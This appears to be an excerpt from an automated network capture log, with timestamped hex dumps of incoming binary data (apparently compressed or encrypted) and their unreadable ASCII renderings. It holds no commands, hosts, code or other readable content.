                                                                                                                                                                                      2021-10-30 11:52:03 UTC33INData Raw: 6e 20 ca 53 a8 8b 9b 9b 32 71 9c 33 e2 84 8a 2b 8f b1 8a e3 d5 43 c7 ca 50 1d aa 2f 3b 17 31 ed c4 b4 a8 f4 67 17 e2 98 7a 3a 8b 47 7b 8d 29 e3 9d a1 f3 1c cb 57 75 47 bd e7 45 32 5d 45 cb 96 f9 c8 ae b1 9f eb ef fb be ef 5b 9c 35 be fc cf 4e 18 8b 5e 56 07 65 fe e9 9f fe 69 73 fb db df fe 94 31 b8 c3 1d ee b0 b9 d4 a5 2e b5 38 21 3c fa e4 38 37 b8 c1 0d 4e 7a 6f 9a 7f d8 89 a0 93 7e 24 7e 1c f0 76 81 ce 3f 7d 17 e4 31 36 97 bf fc e5 17 c7 ec ab bf fa ab 97 9d c7 f3 9c e7 3c 8b b0 fb c8 bb eb 78 11 b0 3f 8e 66 9c 1c cd bd 88 74 71 5c 48 bb 48 e7 a1 a3 7a 62 08 2d 5d 45 95 ef 6d 42 e8 27 f7 57 42 9c 2c 84 f9 87 83 86 c8 11 93 63 e6 0e 9a 9c 38 c4 e7 16 c2 f1 11 3f 27 1e c6 b8 6c 3d 94 80 a7 47 c5 c9 f4 ae 9b 95 aa bc f0 78 0b d9 65 f6 bd 3a 66 8e d7 aa 3f
                                                                                                                                                                                      Data Ascii: n S2q3+CP/;1gz:G{)WuGE2]E[5N^Veis1.8!<87Nzo~$~v?}16<x?ftq\HHzb-]EmB'WB,c8?'l=Gxe:f?
                                                                                                                                                                                      2021-10-30 11:52:03 UTC34INData Raw: 61 1c e4 88 b9 b8 5e 63 15 c3 7d 8a 18 d5 ef 43 84 e2 a3 a1 d3 d3 55 71 31 63 2b 5a 79 a0 73 9c e1 79 53 8e da 28 9a bc bb a0 3a a2 cc c2 40 ad 91 16 ad 76 b4 ca 1e 46 de 08 94 47 b8 68 75 51 6b 67 0d e7 4b 8e 9a ef aa f9 23 50 1c 35 f2 b1 c5 b9 a3 3c f5 31 0e 5a a0 08 15 97 f8 79 6b 8d 59 46 ec b3 fa 10 f5 a2 b2 3f 3b 13 c7 d4 d3 bd 78 a5 73 3d e7 fa d5 af 7e f5 b2 88 f0 0b 47 76 95 f8 b2 38 bf 88 fc c9 9f fc c9 ad d5 01 9a 5b 5a 18 c0 cf 41 d4 e9 38 d2 57 78 7b 7a 70 6c df 4d 03 be e0 ce 4e 0f df 4d 63 21 64 5e 66 d0 0e e6 f5 0b 5e f0 82 ad 66 b3 f4 f1 9b bf f9 9b 17 27 0d 67 84 f2 fc 6d d4 db de f6 b6 ad c5 41 fb 58 58 d5 ce aa bd ba 1e 80 30 bb 3e 24 c2 e3 a7 1b c6 87 f1 15 b4 cd ff e5 01 e7 23 73 d2 80 71 c5 c1 f7 73 1d fb 0a 71 2e 64 73 23 b3 91 4e
                                                                                                                                                                                      Data Ascii: a^c}CUq1c+ZysyS(:@vFGhuQkgK#P5<1ZykYF?;xs=~Gv8[ZA8Wx{zplMNMc!d^f^f'gmAXX0>$#sqsq.ds#N
                                                                                                                                                                                      2021-10-30 11:52:03 UTC35INData Raw: 9a df bd b6 c6 31 45 b2 6b 41 e7 4b 22 a7 45 e7 d0 c7 ab 85 ec 64 ab 38 75 f8 31 66 ea cc e0 97 bf da 4d c3 f1 70 47 dd e1 38 fc bb c3 1f ff f1 1f 6f 35 07 a0 f7 3e 4a dc 59 53 1b 1d b5 39 d3 7b 9f 3c 3f b3 cd 42 88 b6 11 9d 2f 9d 7f 84 be 73 1d 20 da 45 93 63 26 f1 5d 34 24 db 45 a3 5e 8e 8f d0 97 38 36 2e 1a 1f 17 95 3d 0c 11 b3 7a 11 f3 a3 44 1b 91 c5 ab d0 e9 e9 aa f8 5a f6 51 07 e7 bf c5 90 a3 36 42 76 20 4d 6c 97 8c 5e be 93 d9 30 50 1a 2c c5 25 9a c4 23 93 39 23 3b de 68 5b ab 3a 2b 3d b4 f2 46 a8 fa 12 f5 4a 23 ba d8 b9 09 70 b3 c4 09 93 d3 86 63 16 05 7d dc 55 03 c6 c4 6f 62 c4 75 13 52 d8 1a 37 6f 13 22 14 cf f2 44 a6 3b bb 31 db 47 ec 75 63 d7 b8 f9 f8 2b 1e c3 08 75 c4 73 0d 9c 53 16 20 de 4a 4f 5c b8 8d a3 36 20 4a 3b 9e 1f a5 87 16 31 c1 a3
                                                                                                                                                                                      Data Ascii: 1EkAK"Ed8u1fMpG8o5>JYS9{<?B/s Ec&]4$E^86.=zDZQ6Bv Ml^0P,%#9#;h[:+=FJ#pc}UobuR7o"D;1Guc+usS JO\6 J;1
                                                                                                                                                                                      2021-10-30 11:52:03 UTC37INData Raw: 36 79 5c c8 56 f5 50 3f 42 5b e4 ac 11 e2 88 45 21 4f f9 9a cb aa 47 e8 1e 46 58 89 e7 13 57 5a f1 51 c9 ca 40 d4 65 52 d9 55 fa 4a 62 1b 7a 6d ca e2 59 08 2d 1d 8c e6 43 15 87 9e 5d 0c 05 e9 38 07 09 25 31 ed ba 93 c2 b5 8e 5a 8c 67 e9 c3 90 0c 06 43 a2 49 50 85 51 54 de 43 70 dd 8c a8 8c 13 d3 4e 2b 6f 84 5d cb 0b 8d ad 8f 75 76 a3 d2 cd ca e3 b2 51 79 39 57 72 d2 24 e8 dc f1 a2 ed 51 94 e7 b6 0a 95 2f 5b 50 38 03 37 52 5e 2b f1 2d df f2 2d cb 62 a1 5f af a1 f7 1b aa c3 71 71 7e 70 dc 78 55 05 0b e8 5b df fa d6 45 0f e8 58 e8 05 0e 5d 5c 64 81 e3 71 9c bf fe eb bf de 6a e6 c0 29 bb fe f5 af bf 38 68 3c 72 44 d0 b1 e0 79 fb 19 6f 1c 34 1e 3f f1 18 ef bd ef 7d ef a2 07 9d d7 78 ce 81 f1 f4 1d 1e 16 57 1e 01 b6 16 66 ec 5f f3 9a d7 2c bb 58 bb a2 45 4e c7
                                                                                                                                                                                      Data Ascii: 6y\VP?B[E!OGFXWZQ@eRUJbzmY-C]8%1ZgCIPQTCpN+o]uvQy9Wr$Q/[P87R^+--b_qq~pxU[EX]\dqj)8h<rDyo4?}xWf_,XEN
                                                                                                                                                                                      2021-10-30 11:52:03 UTC38INData Raw: 11 39 67 12 e9 b0 91 ad 8e 4b 3d 1a 37 8d 21 e7 a4 12 e5 7b 18 e3 87 25 de c6 11 3d d2 ca 8b 6d ee f5 c1 eb 52 3c 0b 61 56 07 bb c4 a1 4a c7 10 a2 ad d0 1c f3 78 94 98 e7 9c 7a b5 0f e0 95 c4 0a 85 1f 70 c4 66 96 38 38 c8 e8 04 57 19 e1 71 88 e9 c8 9a f6 8a 5e dd 47 05 ed c8 24 e6 31 8e 08 37 5e 39 5c 08 8b 95 44 69 42 ec b0 77 fc 3c 6b ec aa 31 f4 36 28 cc 74 b3 b0 68 5f fa d2 97 5e be 6f c4 77 67 be fa ab bf 7a 71 d8 b4 2b c5 27 7f 3e ed bb d3 c6 4d 57 37 6f dd c0 b9 21 63 7b ae 73 9d 6b 71 46 58 ac 66 84 1d 1e 8e e9 8f 22 5b 70 2c de 53 c6 6e 15 7d e0 fb 4b e7 3b df f9 96 ba 68 b7 1c 35 da 07 8c 3d e7 82 1d 2b 42 f4 38 a3 b7 b9 cd 6d 96 7c 11 c7 50 e7 23 ea 39 26 63 a1 fa 33 28 fb 81 0f 7c 60 9b 3a f8 7f cd 7b dc e3 1e 8b 63 80 83 87 b0 b0 47 e1 fb 4a
                                                                                                                                                                                      Data Ascii: 9gK=7!{%=mR<aVJxzpf88Wq^G$17^9\DiBw<k16(th_^owgzq+'>MW7o!c{skqFXf"[p,Sn}K;h5=+B8m|P#9&c3(|`:{cGJ
                                                                                                                                                                                      2021-10-30 11:52:03 UTC39INData Raw: 10 2c 0a 11 ea e5 fb 3d fc 71 38 5f 3e 17 9c 1f 76 ef 58 fc b0 89 0b 49 6f ce 72 dc d1 dd 29 c6 81 37 fb b3 5b 89 23 4b c8 4e 0e 6d 66 31 6b 95 65 b1 64 0c 71 7c 6f 77 bb db 6d b5 07 68 ce 08 c5 09 c9 a3 8f 0e 75 50 57 cb b1 04 76 86 78 0d c7 2f ff f2 2f 2f 63 8b e0 94 b2 18 f7 da 2b 68 37 bf a6 74 bc ad 0e 7a 09 ed ce 76 a6 d8 59 d4 39 f6 e3 13 c7 31 e0 bb 82 0e 75 55 f7 47 87 7a 39 7f 8c 89 d7 4d 7a 76 57 ed af fe ea af 96 f6 ef 13 8e c7 f5 e9 df f7 73 c8 97 c4 f9 20 d0 73 dd 32 1f 64 13 05 18 2f fa cf b9 93 73 86 c8 39 e3 fc bb 73 86 a0 47 b0 f1 71 a4 0e ea d2 39 e0 b8 88 da 50 09 6d 89 e1 61 8a 33 a3 cf 74 22 e6 79 ba d2 49 84 e2 55 d8 63 d4 0e dc b6 55 6e a6 ce 51 5a f7 59 f2 62 be d2 ae ef df 8d 02 55 a5 11 f4 3d 59 03 03 e9 e2 13 bd 35 e9 55 b6 a2
                                                                                                                                                                                      Data Ascii: ,=q8_>vXIor)7[#KNmf1kedq|owmhuPWvx///c+h7tzvY91uUGz9MzvWs s2d/s9sGq9Pma3t"yIUcUnQZYbU=Y5U
                                                                                                                                                                                      2021-10-30 11:52:03 UTC41INData Raw: 87 45 87 2f b7 b3 13 c6 e2 c9 62 41 bd 15 d4 85 a3 c9 23 bc 08 0b 11 3b 5a 7c c7 8c 45 06 47 cd d1 9c 25 a4 9e d8 2e fe 33 14 47 8d f2 bd dd 29 ca b2 e0 b2 d8 fb 5b f4 05 8f cb f8 61 c4 c7 3e f6 b1 c5 ae 05 8b 28 ef 63 a3 cd 42 f3 45 68 0e 31 a6 0e 2f d6 d5 82 3a 72 4d aa dd ec cc bc e1 0d 6f d8 6a 0f 9c 17 9c ce 11 47 8d 3a e2 23 bb 0c ec 62 9b 39 47 fc 65 15 8f b7 7b bb a7 94 e5 87 21 ad f1 d3 b9 74 a8 b7 f7 3d 43 f4 fc 50 66 14 7e 41 cc d8 70 dd f4 c6 a7 05 63 f1 c2 17 be 70 f3 07 7f f0 07 5b cd 01 f4 c3 c7 51 63 e7 f0 7e 3f ae 13 84 f9 e5 a8 bc 44 ce 15 21 63 2b 27 8d 7e 33 de ee a0 b9 73 96 ed a2 81 da 23 a1 1f 12 d7 23 d8 ce ca 28 59 59 89 93 e9 ab b4 eb c0 f5 a3 92 51 e9 2b 7a f6 9e 3f 5b 77 45 ac a7 aa 57 fa d6 71 35 57 c0 e3 15 3d 9b a6 a3 a6 c2
                                                                                                                                                                                      Data Ascii: E/bA#;Z|EG%.3G)[a>(cBEh1/:rMojG:#b9Ge{!t=CPf~Apcp[Qc~?D!c+'~3s##(YYQ+z?[wEWq5W=
                                                                                                                                                                                      2021-10-30 11:52:03 UTC42INData Raw: 7c 39 9a 90 05 b0 55 1f 30 1e 2c 74 d9 6e da b7 7e eb b7 2e bb 61 ec 2e f1 6b 44 16 5f de 71 e6 68 01 f2 31 16 38 68 94 1f 69 0b 8b 55 fc 8e 11 f5 b2 c8 69 ee c7 6b 80 3f dc c6 39 6e 7d d7 8a e3 71 7c 16 e3 16 d8 f1 5f 9d fc 10 80 f7 cd b1 d3 43 99 56 9b e9 2f c7 e6 97 96 d9 0e 15 fd c7 51 ee ed 42 01 75 c5 47 e7 b1 bf d8 68 ce 0b 1c 01 be cf 27 c7 1c 67 ba e7 98 03 3f 46 71 38 96 1f 2f 9e 4b 1c 1a ed 3c f5 76 19 79 34 dd 03 a7 0f d1 f7 27 9f f9 cc 67 6e 73 0e c0 f9 e4 dc f6 5e 55 c3 bc e1 78 d5 6e 9a 13 fb c4 b5 a7 9d 6c ce 4f fc 21 10 3a c6 32 3a 67 48 74 d0 e4 a4 c9 41 a3 0c 63 e4 e3 ea e7 cf c5 f5 c4 25 31 ad 3a 46 c5 c9 f2 a3 38 3d bd a8 d2 ae 13 31 cf d3 3d 91 bd c8 74 62 24 0f aa b8 18 b1 8d e5 66 f3 62 d8 22 9b d3 4e 2b df f3 ca 2b 57 46 6e 9c 55
                                                                                                                                                                                      Data Ascii: |9U0,tn~.a.kD_qh18hiUik?9n}q|_CV/QBuGh'g?Fq8/K<vy4'gns^UxnlO!:2:gHtAc%1:F8=1=tb$fb"N++WFnU
                                                                                                                                                                                      2021-10-30 11:52:03 UTC43INData Raw: e2 2c 6e 55 5b 28 cb 0e 4c dc 15 89 b0 00 b2 ab c3 77 de 78 64 c5 bf 38 b0 9b 45 3b 41 e7 3b 83 63 f3 3d ae 37 bd e9 4d cb e3 c5 9f fe e9 9f 5e 9c 1c ce 01 ce 14 e7 81 be e2 54 8e 38 69 3a 1f 67 9d 75 d6 56 73 2a aa 8f 73 c1 b9 a5 fd 19 aa 0b 27 cb d1 f8 02 36 d1 11 66 d7 93 31 d6 3b d3 d8 59 e4 8f e1 7b 50 d7 eb 5e f7 ba 6d ea 80 78 5f f1 71 a4 1d 1c 87 39 da 7b ec 49 39 fe 32 ab 45 dc 4d e3 7b 89 fc 09 bf c3 bf 49 30 6e ad e3 71 be df f3 9e f7 a4 bb 69 12 e1 fd 01 e6 8c ae 3d 8e c1 23 74 ea 12 e8 70 c4 e4 98 45 a1 dd 0a e5 a4 65 bb 69 b4 31 0a 6d 41 3c de 13 91 e5 ad 15 a7 ca 1b d1 79 5a 3a 88 fa 35 e2 f5 28 9e 85 30 93 07 87 11 87 56 3a e6 39 ad bc 16 f1 da 15 99 5e ba f4 ea 9d ad 48 b2 2b 74 7c 44 a2 ad a8 e2 4e a6 1f d5 55 a8 ef 3e 16 12 e1 71 67 e6
                                                                                                                                                                                      Data Ascii: ,nU[(Lwxd8E;A;c=7M^T8i:guVs*s'6f1;Y{P^mx_q9{I92EM{I0nqi=#tpEei1mA<yZ:5(0V:9^H+t|DNU>qg
                                                                                                                                                                                      2021-10-30 11:52:03 UTC45INData Raw: d6 f8 66 8e 06 f5 eb d7 b8 ec 78 ea d7 a2 38 b2 38 99 f4 31 6b bb c6 c0 7f f1 a9 71 d3 f1 9c 99 7f cc a0 7c eb fb 69 fc 5b 06 e7 b2 b5 9b 46 5b 70 0c c9 6f 5d 17 8c 49 dc 85 c4 d6 45 63 e8 c4 dd 34 9c 5a 7f 77 1a e7 09 c7 9f eb 87 be 32 d7 08 69 0b 42 9a 50 0e 9b 1c 38 ca 71 3c bf 27 73 ec e3 2c 55 1b 33 fd a8 ae 25 cc ad 4c 2f f1 fa b2 b8 88 ba 56 9e 53 d9 65 7a a8 e2 30 9a 07 99 6d 0c 45 4c 67 f8 1c 8b 64 79 99 6e 78 65 a8 0e 86 5e 32 8b 77 3e c6 47 45 65 3c 74 46 75 30 ab 8f 68 0c 46 c7 63 b4 5e 18 b5 9d a9 33 63 d7 f2 3d a8 3f 13 bf 29 1c 37 66 76 d3 e8 47 f6 45 fb 6c 3e b0 78 6b 41 19 71 5c 04 63 c4 c2 f7 a1 0f 7d 68 f9 de 13 bb 1e f1 bb 57 2c 44 5a 8c 84 ca 09 f2 7c c7 84 1d 98 56 df 80 f2 71 37 89 3f 35 e7 5d 70 bc 74 96 5f 9d e2 f4 51 17 fd c1 79
                                                                                                                                                                                      Data Ascii: fx881kq|i[F[po]IEc4Zw2iBP8q<'s,U3%L/VSez0mELgdynxe^2w>GEe<tFu0hFc^3c=?)7fvGEl>xkAq\c}hW,DZ|Vq7?5]pt_Qy
                                                                                                                                                                                      2021-10-30 11:52:03 UTC46INData Raw: 8c 3e d3 65 fa 11 a7 2c 8a d7 a1 b8 88 ba 56 1e cc ea 44 2b 3d 63 0b 31 2d 46 ed 66 d0 5c 8d 64 7a e9 4e cc ca 68 94 a5 b3 8a 40 79 55 7e 84 ce 8e 8a 13 75 8a 67 3a 27 d3 41 a5 87 d1 32 99 dd cc 58 54 b4 da 16 99 b1 8d ec 52 56 50 c7 6c 3d b2 f7 72 6b ea 39 4c 66 77 d3 de f7 be f7 9d f2 c6 76 a8 e6 c2 ec 35 93 fd d7 a3 16 22 42 5f 64 a8 57 e3 19 17 75 1e c5 b9 13 f1 9a d7 bc 66 f9 83 fa 16 d4 83 53 a1 5d 32 de 6f 76 a9 4b 5d ea c4 4e 14 0e 0e ff 38 c0 77 e6 b0 6d c1 ce 49 ef 3b 65 e8 f9 8e 9a a0 3f 8c 7f 1c 2f ed a8 21 d5 58 d2 9e d6 ee 1c af ce 68 ed 0a 81 fa cf df 72 39 d2 3b 38 2d bc 33 8e ef eb c9 d9 e1 7b 6d 3c c6 75 c8 e7 dc d0 ee 99 b6 a3 f3 71 e3 fc cf fc ff 2c 70 5c ff 77 0b 71 f9 cb 5f fe a4 d7 88 f0 dd 32 fe 48 3f 83 73 8f 70 0e e4 30 47 68 6b
                                                                                                                                                                                      Data Ascii: >e,VD+=c1-Ff\dzNh@yU~ug:'A2XTRVPl=rk9Lfwv5"B_dWufS]2ovK]N8wmI;e?/!Xhr9;8-3{m<uq,p\wq_2H?sp0Ghk
                                                                                                                                                                                      2021-10-30 11:52:03 UTC47INData Raw: 98 f8 c5 1a 0b 47 84 5d 91 7d ee a6 45 d8 69 62 d7 00 27 81 45 87 5d 35 2d 06 19 1c 23 fe 22 2e ce 2f a5 b1 cd 9c 34 1c 42 7e a1 a9 f7 9c e1 28 f0 5e 33 6c 79 4d 07 f5 57 ce 1a 75 52 1f bb 30 80 a3 46 1f f8 5e 17 21 2f 20 f5 f3 a8 05 4e ed f3 3c e0 91 1f 63 5a f5 99 76 c4 ef 82 79 5f 1d c6 6f 84 6a 47 8d b1 60 0e c8 81 a8 da c4 a2 e6 3b 43 11 9c 7b 9c 0c de 97 c6 dc c1 49 e3 df 1b f8 b7 86 0c 39 22 2d 07 91 71 8b 7f 07 e6 f0 78 95 f7 d7 e1 5c f1 85 7d e6 21 63 df 83 be e8 85 bb c0 77 d2 78 cd 8a fe 39 42 8f 3c b3 1f 10 08 ce 87 6c ab 71 a3 fd f1 f5 31 da 65 e5 1c 7f f2 93 9f dc 6a 0f 60 4c b2 1f 60 f8 fc d1 31 75 3c 42 da 42 88 c8 e9 e2 38 84 a4 c9 97 83 c6 71 e5 a0 a8 1c 36 2a 27 21 ad 3a b1 43 1c ca 4b 62 7a 56 aa f2 99 3e d3 ad d1 8f 8a 97 57 dc 89 7a
                                                                                                                                                                                      Data Ascii: G]}Eib'E]5-#"./4B~(^3lyMWuR0F^!/ N<cZvy_ojG`;C{I9"-qx\}!cwx9B<lq1ej`L`1u<BB8q6*'!:CKbzV>Wz
                                                                                                                                                                                      2021-10-30 11:52:03 UTC49INData Raw: 7a 24 84 59 1d 78 dc 69 d9 f4 d2 30 aa 13 ca ab c2 19 5a 73 a4 ca 73 7d 8c a7 77 89 ac 22 74 99 1e 2a 3d 1d 94 78 3a c6 33 dc ce a9 ca ac b5 73 d6 e6 1d 26 6b 8f bb 8f f6 ee ab cf b1 1e a5 5d bf af 63 45 58 38 79 29 27 8f a5 58 90 70 12 b4 30 23 dc 8c b1 61 27 84 7c 84 78 6f a7 8b 9b 3c bb 11 d5 8b 54 e9 4f ec 13 37 7c be fc 3d bb 9b c6 e2 c0 6e 02 0b 85 a0 6e 5f 80 b8 f9 3a 2c 6a 38 11 ee a4 49 e7 5f ac e7 7b 4e 38 5e 2a 1f af 65 8e c3 c2 ea 3b 23 2c 76 72 08 94 ce 50 1b 05 75 5f ed 6a 57 5b 1c 54 16 63 c6 c3 17 78 ea e3 51 97 ef 7e f5 16 46 9c cc 16 d4 c9 f8 64 0e 0f 8b 71 ef f1 1d d0 8f f8 8b 5b 9c 8b 7b dc e3 1e 27 9c 34 9c 0c ea e2 3f 5e 79 a4 ee 70 de 62 1f 5a 8f 7f 81 63 66 2f ba e5 95 2e 38 da 9a cb fc ff 29 3f e6 e0 57 b8 f1 bc 54 b0 d3 f7 86 37
                                                                                                                                                                                      Data Ascii: z$Yxi0Zss}w"t*=x:3s&k]cEX8y)'Xp0#a'|xo<TO7|=nn_:,j8I_{N8^*e;#,vrPu_jW[TcxQ~Fdq[{'4?^ypbZcf/.8)?WT7
                                                                                                                                                                                      2021-10-30 11:52:03 UTC50INData Raw: ed 94 23 14 41 2f e7 a2 b2 41 a7 5d 57 76 d1 f8 1e 1a c7 64 1c 39 5f ec 44 e1 70 00 76 38 12 ea 4b 1c a3 0a 6c 7f fd d7 7f 7d d9 1d 74 28 8f d0 06 c5 95 76 b8 0e b8 6e b2 79 8b 2d ef 65 a3 8f 11 f2 fc bb 93 72 76 f9 93 78 7e cc e3 b0 9b c6 dc 94 73 84 c8 49 43 e4 54 e1 a0 21 1a 53 a0 4d 8c 09 4e 59 14 39 6b 08 36 cc 59 8d 1d e5 75 7e a8 d3 9d 35 74 95 c3 26 b2 f9 84 2e 93 2c 6f 17 5d 4b 74 cd b6 44 75 8e 84 30 ab 83 d9 38 f4 d2 b0 8b 2e 22 9b 11 5b 88 73 c0 59 9b e7 9c 7a 87 f8 0c b1 30 e9 d1 0a e9 98 24 4b cf 10 cb b4 ea c9 f4 ad 63 ae cd 13 23 36 3d 46 c7 74 84 5d da b3 8f be 50 87 a4 85 f2 f7 71 cc 19 38 5e f6 f2 50 6e b8 fc 22 54 ff 3d 39 d2 2e 76 36 22 94 43 32 a7 81 1f 33 f0 1d 22 1e ef e0 a8 b0 f8 00 df 2f 02 16 78 5e 2e 8a d3 c6 c2 91 c1 82 c0 23
                                                                                                                                                                                      Data Ascii: #A/A]Wvd9_Dpv8Kl}t(vny-ervx~sICT!SMNY9k6Yu~5t&.,o]KtDu08."[sYz0$Kc#6=Ft]Pq8^Pn"T=9.v6"C23"/x^.#
                                                                                                                                                                                      2021-10-30 11:52:03 UTC51INData Raw: 32 7e 0b 1d 97 5f 64 e2 e8 c4 5f 36 b2 78 d3 3e 44 c4 be e0 44 f0 2e bb de 4e 1e 65 18 0b 39 21 38 e6 0f 7f f8 c3 b7 b9 9f 85 9d 54 39 12 3a 7e 06 7d e3 31 e5 43 1f fa d0 72 27 4d 63 ab f6 7a bb 89 cb 11 12 7c c0 e0 b1 35 63 1f 77 d5 68 3b 4e 26 1f 40 b0 e3 f1 3b 73 8e 47 c7 7a 2c 4f 9d b7 bd ed 6d 4f 79 31 2e d7 09 e5 d5 1e 39 43 84 e8 e9 27 36 5c 0f 72 a0 e4 a8 d1 2f df 4d 73 07 4d c2 dc 93 48 47 19 77 d4 38 4e 74 d4 fc 58 ee a8 d1 46 1f 2b 8d 2d 61 94 4c bf 8b 4e 7a 91 e5 d3 af 4c ef f6 8a f7 c2 a8 83 96 0e 46 e2 30 9a 27 46 75 30 a2 57 bc b2 75 fc 7c 3b b3 fa 11 4e b9 a2 63 65 bd ca 63 27 5d 2a dd 0c 55 59 a5 2b 7d 45 2f bf c5 6c dd 99 7d 36 9e 6b 4f e0 da be ac 29 47 19 c9 be d8 67 5d 15 ec 5e e0 f8 70 a3 e2 11 a7 60 cc 79 07 1a 8f 08 71 20 70 d6 b8
                                                                                                                                                                                      Data Ascii: 2~_d_6x>DD.Ne9!8T9:~}1Cr'Mcz|5cwh;N&@;sGz,OmOy1.9C'6\r/MsMHGw8NtXF+-aLNzLF0'Fu0Wu|;Ncec']*UY+}E/l}6kO)Gg]^p`yq p
                                                                                                                                                                                      2021-10-30 11:52:03 UTC53INData Raw: fa 42 fd fc df 2b 7f 61 c5 5c d2 ee 96 a3 3a 80 31 e4 7a 8c ff de c0 18 c8 49 a3 bc da 87 8e 3a e5 a8 31 af b8 1e 98 5b 9a 5f 94 d1 f5 80 83 e6 82 0e a1 9d 6a 33 63 ad 36 69 0c 74 3c 44 6d 20 c4 c6 fb 43 59 09 75 4a 94 8e f9 b1 8c 24 d3 ef a2 43 e2 f1 5d 1c d7 8d 86 90 c5 7b f9 50 c5 61 34 4f 8c ea a0 d2 83 f2 dc 26 d3 81 e6 ae 87 92 98 76 a9 f2 46 f4 8a 2f e1 67 3e f1 9e 68 51 65 18 d3 2d aa 81 f1 72 b1 ae 58 a7 0f 56 25 ca 17 1e 8f b4 f2 e0 30 ca 46 bd d2 84 92 2a ed 61 46 2b af 62 b4 cc 9a ba 47 89 7d 23 cc 74 87 01 0e 1a 0e 02 3b 68 dc f0 b9 a1 71 f3 65 01 40 b8 21 3b e4 73 93 c7 01 d2 5f 1a b1 33 c4 ae 0d 3f 10 c0 11 51 19 16 56 9c 30 ec 09 81 c5 85 45 45 8b 16 7a 1e 39 f1 fd 20 47 0b 02 fd 66 11 d1 8d 3d c2 63 23 bd 60 f5 72 97 bb dc f2 a8 89 1d 2d
                                                                                                                                                                                      Data Ascii: B+a\:1zI:1[_j3c6it<Dm CYuJ$C]{Pa4O&vF/g>hQe-rXV%0F*aF+bG}#t;hqe@!;s_3?QV0EEz9 Gf=c#`r-
                                                                                                                                                                                      2021-10-30 11:52:03 UTC54INData Raw: 85 42 8b af 88 d7 81 8f 07 37 60 49 84 72 5a e4 b4 00 65 75 b1 70 08 16 9d 27 3c e1 09 cb 17 fe b3 9d 18 16 15 5e a8 ca 2f f4 04 75 53 ce fb 27 69 b5 4f 64 6d 8c ed 74 94 e7 76 8a bb 08 e2 1c df db 04 c4 65 47 5c 78 5c a8 ac e2 82 36 83 1f 4f c8 2e e6 91 96 4e 71 89 8e c3 38 b3 90 6b 31 77 a2 53 88 bd 9c 0d c1 6e 1a 7f c1 24 67 3b ee 8a 02 f5 3e f3 99 cf 5c 7e 81 2c a8 3b fb 60 21 62 7b 25 6a 8b 43 7b d4 8f 51 c7 13 bc 7f aa 57 a2 f6 e9 d1 24 ce 12 8e 93 1e 79 6a 57 0d e7 8a 39 c9 b1 f9 20 82 93 24 c7 49 8f 22 dd 61 d2 b8 eb 38 1c 03 61 dc 10 39 84 ee a8 21 72 e4 d4 56 8e 85 c8 31 c3 49 d3 0e 1e c7 e6 98 38 88 d8 b8 b3 c6 58 f9 1c ad 04 5a e9 4a 7a 75 7b 3d 8a 67 21 cc ea 60 24 0e a3 79 10 d3 62 17 bd e2 84 1e f7 30 c2 7c 51 28 89 e9 4a 27 a9 f2 a2 de d3
                                                                                                                                                                                      Data Ascii: B7`IrZeup'<^/uS'iOdmtveG\x\6O.Nq8k1wSn$g;>\~,;`!b{%jC{QW$yjW9 $I"a8a9!rV1I8XZJzu{=g!`$yb0|Q(J'
                                                                                                                                                                                      2021-10-30 11:52:03 UTC55INData Raw: ea 44 95 e7 fa 68 93 5f e1 06 9d 88 e2 c4 74 46 ab 01 fb a0 d7 86 ac dd 91 b5 f9 bd 72 3d e2 78 1c c6 f8 1c 26 a3 fd 8f 76 bd f4 be 38 65 c2 7f e6 86 ef 28 9f 50 8b 81 20 ee e2 48 e7 0b 0a 37 e6 28 be c8 08 95 ad 04 7b 95 91 08 c5 3d 4f 12 cb 20 c0 22 e4 e8 8b e7 6a 9b c3 22 c4 7b bc 58 90 84 d7 d5 c3 ed bc 9c e2 59 1b 5d aa 3e 88 4c 57 d1 2a 8f 54 6d a9 c8 6c 5b e2 30 bf a3 2e 12 f3 49 53 8e 73 e2 f0 23 18 be 93 c6 63 4f e6 18 73 30 42 39 ce 61 7c bd 4c af 0d 22 6b bf 42 e6 13 4e 8b 76 ad a4 23 8d 43 c3 77 c4 70 a2 48 c7 b6 7b bd c4 25 9c 0b 09 fd 71 d1 79 52 9f 38 36 f5 cb 81 42 48 23 de 2e b5 2d 13 50 1c 3b 77 d2 54 37 4e 5a dc 55 73 47 4d d7 bc 3b 6a 72 d2 b4 b3 26 47 4d 7d a3 9c 50 3b 20 c6 77 11 e1 e9 2a 04 8f 8b 2c bf 2a 53 c5 61 34 4f ec a2 13 2d
                                                                                                                                                                                      Data Ascii: Dh_tFr=x&v8e(P H7({=O "j"{XY]>LW*Tml[0.ISs#cOs0B9a|L"kBNv#CwpH{%qyR86BH#.-P;wT7NZUsGM;jr&GM}P; w*,*Sa4O-
                                                                                                                                                                                      2021-10-30 11:52:03 UTC57INData Raw: 92 e9 66 89 e3 7e ee 73 9f 7b 1b ab 79 ff fb df bf 8d 1d 30 da 8e 7d b4 f7 4c 42 d7 f4 0c 2a 13 cb 65 3a 1c 01 1c 02 e7 ca 57 be 72 f7 b1 27 e5 5e fa d2 97 9e 54 5f 66 d7 c2 cf a5 d7 83 1e 47 c3 e1 8f d8 a9 9f 0f 01 38 68 bc 3a 84 dd bc 1b df f8 c6 5b 8b 03 7a ce 9a f4 84 2e 72 c0 e4 40 45 51 bd 72 b4 54 1f c4 30 43 f6 08 c7 73 87 4d 4e a1 ef ac c9 59 23 4f c7 a3 ff ec 96 e1 ac c5 9d 35 1c 35 ed ac 71 ce b0 f3 0f 6a 8e b7 65 56 bc bc e2 1e 42 16 1f d5 41 15 87 d1 3c 88 69 b1 0f 7d 75 2c d7 57 36 33 54 f7 bb 59 fd 08 cd ab 97 c6 4b 9c aa 53 ad 86 8c 34 32 ab b7 6a c3 0c 23 e5 b3 fc aa 5c 4f 9f e5 b5 60 6c 66 44 64 ba 48 cf 66 a4 fc 3e d1 d8 cc 8e d1 08 b1 ad ad 74 2b 4f 37 50 49 4c 47 21 df 71 fb 8c 4a 0f 5e 67 cb 6e 14 16 12 87 3f 60 6f c1 79 71 47 6d 1f
                                                                                                                                                                                      Data Ascii: f~s{y0}LB*e:Wr'^T_fG8h:[z.r@EQrT0CsMNY#O55qjeVBA<i}u,W63TYKS42j#\O`lfDdHf>t+O7PILG!qJ^gn?`oyqGm
